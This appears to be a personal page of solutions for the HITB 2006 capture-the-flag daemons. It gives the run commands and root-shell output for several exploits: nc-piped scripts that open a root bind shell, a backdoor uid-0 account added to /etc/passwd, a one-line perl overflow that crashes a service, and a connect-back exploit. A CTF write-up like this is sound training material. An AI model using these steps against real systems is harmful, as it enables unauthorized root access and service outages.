Matador's site

    HITB 2006 CTF daemons solutions:

    Daemon  Source  Exploit                        Details
    01      Source  Work in progress (80%)         Details
    02      Source  Work in progress (20%)         Details
    03      Source  the daemon03 exploit (Day1)    Details Day1
                    the daemon03 exploit (Day2)    Details Day2
    04      Source  the daemon04 exploit (Day1)    Details Day1
                    the daemon04 exploit (Day2)    Details Day2
                    Denial of Service
    06      Source  the daemon06 exploit           Details



    Remote root shell



    This exploit creates a root shell that listens on port 12345.
    Steps to do:

    - python ./exp03.py | nc IP-address 3333

    - nc IP-address 12345

    Result:

    debian:~# nc IP-address 12345
    ls
    bin
    boot
    cdrom
    dev
    etc
    ...
    tmp
    usr
    var
    vmlinuz
    vmlinuz.old
    id
    uid=0(root) gid=0(root)

    not bad :-P


    Day2 ..take the flag


    Steps to do:

    - python ./exp03.py.day2 | nc IP-address 3333

    - nc IP-address 12345

    debian:~# nc 1.21.198.53 12345
    AAAAAAAAAABBBBBBBBBP

    the flag :-)


    Remote Add User



    This exploit adds a user to the machine with the following credentials:

    user: matador
    password: matador

    Steps to do:

    - python ./exp.py.day1 2 | nc IP-address 4444

    - ssh matador@IP-address

    Result:

    /etc/passwd

    ...
    daemon03:x:1003:65534::/flags/daemon03:/bin/false
    daemon04:x:1004:65534::/flags/daemon04:/bin/false
    daemon05:x:1005:65534::/flags/daemon05:/bin/sh
    daemon06:x:1006:65534::/flags/daemon06:/bin/false
    daemon07:x:1007:65534::/flags/daemon07:/bin/false
    matador:AA5hsAy6/h3Wk:0:0::/:/bin/sh

    ssh matador@IP-address
    matador@IP-address's password:
    Linux ctf 2.6.15-26-686 #1 SMP PREEMPT Fri Sep 8 20:16:40 UTC 2006 i686 GNU/Linux

    The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
    root@ctf:/# id
    uid=0(root) gid=0(root) groups=0(root)
    root@ctf:/#

    Maybe there are easier versions, but this is the one I found :-P


    Exploit on Day2 image



    Steps to do:

    - python ./exp.py.day2 2 | nc IP-address 4444

    - nc IP-address 12345

    Result:

    matador@matador-desktop:~$ nc IP-address 12345
    0000000 4141 4141 4141 4141 4141 4242 4242 4242
    0000010 4242 5042 000a
    0000015

    the flag :-P


    Denial of Service


    There is another exploit (DoS) for this daemon:

    perl -e "print 'a'x2105" | nc IP-address 4444

    It's very simple, but it works well! :-P


    Connect back..flag


    The exploit works like this:

    - replace "localhost" in the source with the target IP

    - compile the source "gcc -lpthread -o exp06 exp06.c"

    - use it... :P


    daemon01 and daemon02


    They are quite difficult, especially the second one.

    If you want to help me, please contact me :)


    Mac


    An article about a technique to exploit Mac on x86:

    ENG version
    ITA version
